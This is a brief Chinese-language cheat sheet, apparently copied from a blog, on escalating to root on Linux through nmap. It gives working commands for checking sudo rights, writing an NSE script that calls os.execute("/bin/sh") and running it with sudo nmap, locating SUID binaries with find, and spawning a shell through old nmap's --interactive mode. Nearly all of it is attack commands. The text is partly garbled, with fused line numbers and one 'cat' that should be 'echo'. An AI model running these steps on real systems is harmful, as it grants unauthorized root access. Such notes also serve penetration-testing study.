nmap提权12345678910111213141516171819202122232425262728sudo -l存在root无密码运行nmapecho 'os.execute("/bin/sh")' > getShellsudo nmap --script=getShell第一个:#就是低版本可以用那个交互式find / -perm -u=s -type f 2>/dev/null#查询可以用得suid#nmap老版本支持“interactive.”选项,用户能够通过该选项执行shell命令/usr/local/bin/nmap --interactivenmap --interactive #即可得到交互式shellnmap>#之后输入!sh#要求:nmap有s标志位+----nmap版本足够老------------------------------------------------第二个:nmap以root运行cat os.execute("/bin/sh") > nse_root.nse#nse是nmap的插件扩展名nmap --script=/home/jens/nse_root.nse